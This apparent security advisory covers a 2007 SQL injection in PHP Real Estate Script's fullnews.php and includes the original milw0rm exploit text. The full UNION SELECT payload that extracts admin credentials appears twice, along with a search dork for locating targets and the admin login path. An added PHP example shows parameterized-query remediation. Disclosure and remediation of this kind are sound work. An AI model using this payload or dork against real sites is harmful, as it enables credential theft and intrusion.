Vendor: PHP Real Estate Script
By: t0pP8uZz & xprog
CVSS: 7.5 (HIGH)
SQL Injection
CWE: 89
Product Name: PHP Real Estate Script
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Platforms Tested:
2007

PHP Real Estate SQL Injection Vulnerability

The vulnerability allows an attacker to pull admin info from the database. The vulnerable page is fullnews.php, where the id parameter reaches the SQL query unsanitized. The exploit uses a UNION SELECT statement to retrieve the username and password from the admin table. The payload is: www.site.com/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*

Mitigation:

The vulnerability can be mitigated by implementing proper input validation and parameterized queries in the code.
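
That mitigation applied to the id parameter of fullnews.php, as an added example that is not the vendor's code or part of the original advisory. The table news, its columns and both function names are assumptions, and an in-memory SQLite database stands in for the script's own database.

```php
<?php
declare(strict_types=1);
// Added example, not the vendor's code. Hypothetical names: table `news`, its columns,
// parse_news_id(), fetch_news(). SQLite in memory stands in for the script's database.

function parse_news_id(mixed $raw): ?int
{
    // Allow-list: a positive integer only. Arrays, null and strings with SQL text fail.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function fetch_news(PDO $db, int $id): ?array
{
    // The id is bound as a typed parameter; it never becomes part of the SQL text.
    $stmt = $db->prepare('SELECT id, title, body FROM news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$db->exec("INSERT INTO news VALUES (1, 'Constructed listing news', 'Sample body')");

// Constructed inputs; the last is the id value from the advisory above.
$inputs = [
    '1',
    '999',
    ['1'],
    '-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*',
];

foreach ($inputs as $raw) {
    $id = parse_news_id($raw);
    if ($id === null) {
        echo "400 rejected\n";           // in fullnews.php: http_response_code(400); exit;
        continue;
    }
    $news = fetch_news($db, $id);
    echo $news === null
        ? "404 not found\n"
        : '200 ' . htmlspecialchars($news['title'], ENT_QUOTES, 'UTF-8') . "\n";
}
```

The integer check and the bound parameter are independent layers: either one alone keeps the UNION payload out of the query text, and keeping both means a later change to one does not reopen the injection.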

Exploit-DB raw data:

--==+================================================================================+==--
--==+		          PHP Real Estate SQL Injection Vulnerabilities	             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://phprealestatescript.com
DORK: "Browse with Interactive Map"


DESCRIPTION: 
pull admin info from database


EXPLOITS:
www.site.com/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*


NOTE/TIP: 
admin login is at /admin/


GREETZ: milw0rm.com, h4ck-y0u.org !


--==+================================================================================+==--
--==+		          PHP Real Estate SQL Injection Vulnerabilities	             +==--
--==+================================================================================+==--

# milw0rm.com [2007-12-14]